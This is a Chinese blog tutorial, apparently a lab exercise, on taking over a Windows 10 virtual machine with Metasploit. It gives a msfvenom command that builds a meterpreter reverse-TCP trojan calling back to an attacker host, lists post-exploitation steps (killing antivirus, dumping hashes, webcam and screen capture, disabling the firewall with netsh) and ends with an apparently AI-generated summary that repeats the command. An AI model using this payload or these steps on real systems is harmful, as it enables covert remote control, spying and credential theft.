2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机

本文章仅限学习,切勿违法乱用

注意:本次实验仅可在自己电脑,且断开网络的情况下进行,不可入侵他人电脑,千万注意要遵纪守法

使用metasploit(MSF) 和 木马 入侵win10 虚拟机

0x01 实验环境

 攻击机:kali linux 

 ip:192.168.171.128

 目标机:windows 10 家庭普通版(虚拟机)

 ip:物理主机

0x02配置msf

1.开启数据库服务 service postgresql start

2.初始化数据库 msfdb init

3.进入msf

4.

加载模块,显示参数

5.

修改参数

LHOST为攻击机ip,LPORT为监听端口

6.开始监听

0x03 木马

1.生成木马(LHOST为攻击机ip,LPORT为监听端口)

─(root💀kali)-[/home/kali]

└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.171.128 LPORT=1234 -f exe -o win7-1.exe

2.将木马复制到win10(虚拟机)电脑上

0x04 入侵

打开木马程序

攻击机收到数据

msf exploit(handler) > sessions(查看上钩的用户)

msf exploit(handler) > sessions -i 1(选择需要攻击的用户,这里选择第 1 个)

进入meterpreter了,即可进行一些相关的木马操作

0x05 入侵成功 进行操作

执行杀死杀毒软件进程操作

获取目标主机用户的哈希值(需要先获得管理员权限,输入getsystem获得,输入getuid获得当前权限)

获取实时屏幕

开启摄像头,并监控

远程关闭防火墙

netsh advfirewall set allprofiles state off

效果如下:

输入shell

进入shell界面

echo hello who are you? > 1.txt   echo + 内容  > 文档名

type +文件名 打开文档

出现乱码时,输入 chcp 65001

  • 1
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploit是一款功能强大的渗透测试工具,可以用于创建和管理各种类型的恶意软件,包括木马。对于在Windows 10系统上使用Metasploit创建木马,您可以使用msfvenom来生成适用于Windows 10的恶意软件。 例如,您可以使用以下命令来生成一个适用于Windows 10系统的反向TCP木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.171.128 LPORT=1234 -f exe -o win10-1.exe 这个命令将生成一个名为win10-1.exe的可执行文件,其中包含一个反向TCP木马。通过将此木马传递给目标系统,并确保您的监听器配置正确,您可以在目标系统上建立一个与Metasploit的反向连接,以便执行各种操作,如查看目标的桌面、监听麦克风、打开摄像头等。请注意,创建和使用恶意软件可能是非法的,只能在合法的渗透测试或授权的安全测试中使用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [6. MetasploitMetasploit木马](https://blog.csdn.net/qq_41860876/article/details/105627201)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *3* [2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机](https://blog.csdn.net/White_give_boy/article/details/116477691)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值